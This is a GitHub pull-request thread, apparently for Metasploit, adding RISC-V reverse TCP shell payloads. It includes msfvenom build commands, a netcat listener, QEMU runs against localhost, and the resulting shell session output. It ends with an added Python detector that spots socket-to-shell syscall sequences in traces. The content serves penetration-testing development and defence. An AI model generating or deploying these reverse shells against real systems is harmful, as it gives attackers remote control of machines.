@bcoles commented Nov 20, 2025

Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.

Source

Verification

Tested with QEMU. For other test environments, see #19518 (comment).

Generate a Linux Command Shell, Reverse TCP Inline payload (with optional NOP sled):

./msfvenom -n 100 -f elf -p linux/riscv64le/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 > rev.elf
./msfvenom -n 100 -f elf -p linux/riscv32le/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 > rev.elf

Start a netcat listener nc -lvp 1337 (or use exploit/multi/handler).

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-riscv64 -strace ./rev.elf
$ /home/user/qemu/build/qemu-riscv32 -strace ./rev.elf

Note the payload was executed successfully and a reverse shell was received :)

@bcoles force-pushed the linux-riscv-tcp-reverse-shell branch from 003bbc9 to dffbcd6, November 23, 2025 04:47
@bcoles changed the title from "Add Linux RISC-V 64-bit TCP reverse shell payload" to "Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads", Nov 23, 2025
@bcoles force-pushed the linux-riscv-tcp-reverse-shell branch from dffbcd6 to bb5ea49, November 23, 2025 05:09
@dledda-r7 self-assigned this, Nov 24, 2025
msf payload(linux/riscv64le/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),102(lxd)
ls
chmod_64.elf
notreadme
revshell_riscv64.elf
echo ":)"
:)
uname -a
Linux ubuntu 6.14.0-13-generic #13.2-Ubuntu SMP PREEMPT_DYNAMIC Sun Apr  6 05:26:54 UTC 2025 riscv64 riscv64 riscv64 GNU/Linux

msf payload(linux/riscv32le/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...


Shell Banner:
= 2
293092 dup3(3,1,0) = 1
293092 dup3(3,0,0) = 0
293092 execve("/bin/sh",{)
-----
          
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),106(bluetooth),113(scanner),136(wireshark),137(kaboxer),141(docker)
ls
a.out
chmod_32.elf
chmod_64.elf
metsrv.exe
metsrv.mipsel
metsrv.og.mipsel
metsrv.x64.exe
mips_sc.s
notreadme
payload.aarch64.exe
revshell_riscv32.elf
revshell_riscv64.elf
uname -a
Linux kali 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 GNU/Linux
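
For the defensive side of the verification above, an added example (not part of the pull request or the Metasploit code base): a Python check that flags a traced process which connects a socket, duplicates it onto stdio with dup3, and then execs a shell, the sequence partly visible in the Shell Banner output. The sample trace is constructed, and the socket/connect line format, the `SHELLS` list and the function names are assumptions.

```python
import re
from collections import defaultdict

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}  # assumed watch list

def parse(line):
    """Split 'PID name(args) = ret' into fields; ret is None when absent."""
    m = re.match(r"\s*(\d+)\s+(\w+)\((.*)$", line)
    if not m:
        return None
    pid, name, rest = m.groups()
    args, _, tail = rest.rpartition(")")
    ret = re.search(r"=\s*(-?\d+)", tail)
    return pid, name, [a.strip() for a in args.split(",")], int(ret.group(1)) if ret else None

def find_socket_shells(lines):
    """Return (pid, shell, stdio fds) for each shell exec'd with stdio on a connected socket."""
    socks, connected, stdio = defaultdict(set), defaultdict(set), defaultdict(set)
    hits = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        pid, name, args, ret = ev
        fd = int(args[0]) if args[0].isdigit() else None
        if name == "socket" and ret is not None and ret >= 0:
            socks[pid].add(ret)
        elif name == "connect" and ret == 0 and fd in socks[pid]:
            connected[pid].add(fd)
        elif name in ("dup2", "dup3") and ret in (0, 1, 2):
            # The stdio fd now points at whatever fd was duplicated onto it.
            (stdio[pid].add if fd in connected[pid] else stdio[pid].discard)(ret)
        elif name == "execve" and args[0].strip('"') in SHELLS and {0, 1} <= stdio[pid]:
            hits.append((pid, args[0].strip('"'), sorted(stdio[pid])))
    return hits

# Constructed sample trace (not captured output), modelled on the banner lines above.
SAMPLE = """\
293092 socket(PF_INET,SOCK_STREAM,IPPROTO_IP) = 3
293092 connect(3,0x0000004000800f10,16) = 0
293092 dup3(3,2,0) = 2
293092 dup3(3,1,0) = 1
293092 dup3(3,0,0) = 0
293092 execve("/bin/sh",{)
400001 openat(AT_FDCWD,"out.log",O_WRONLY) = 3
400001 dup3(3,1,0) = 1
400001 execve("/bin/sh",{)
""".splitlines()
print(find_socket_shells(SAMPLE))
```

Only the first process is reported; the second redirects stdout to a file before running a shell and is ignored. A truncated trace that lacks the socket and connect lines, like the banner fragment alone, produces no hit.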
